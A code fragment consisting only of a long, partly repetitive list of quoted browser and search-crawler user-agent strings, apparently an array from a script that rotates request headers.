'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0',
'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0(compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)',
'Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10',
'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
